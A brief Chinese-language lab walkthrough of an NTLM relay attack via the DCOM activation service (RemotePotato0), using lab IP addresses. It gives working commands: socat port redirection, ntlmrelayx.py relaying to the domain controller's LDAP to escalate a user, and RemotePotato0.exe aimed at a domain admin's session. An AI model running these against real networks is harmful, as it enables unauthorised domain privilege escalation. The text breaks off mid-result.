复现RPC中继NTLM身份验证

滥用 DCOM 激活服务的方法，即解组IStorage对象并将 NTLM 反射回本地 RPC TCP 端点以实现本地权限提升。虽然此漏洞已被修补，但 DCOM 激活服务曾经（现在仍然是）用于 RPC 身份验证的有效触发器。复现环境:DC: 10.10.10.139受害者机器:10.10.10.140攻击机:10.10.10.178首先查看用户的会话 可以看到这里有域管的一个会话 可以看他的会话ID为1然后我们到攻击机进行重定向转发需要您在vps上重定向转发 sudo socat TCP-LISTEN:135,fork,reuseaddr TCP:(目标机器):9997 &sudo socat TCP-LISTEN:135,fork,reuseaddr TCP:10.10.10.124:9997 &进行Ntlm中继监听python3 ntlmrelayx.py -t ldap://10.10.10.139 --no-wcf-server --escalate-user win2016  这里中继到ldap --escalate-user 这个参数是你要提升权限的用户接着我们去受害机器触发.\RemotePotato0.exe -m 0 -r 10.10.10.178 -p 9998 -s 1这里-s 1 是会话ID为1的域管接着来到攻击机可以看到这里已经权限 ………………………………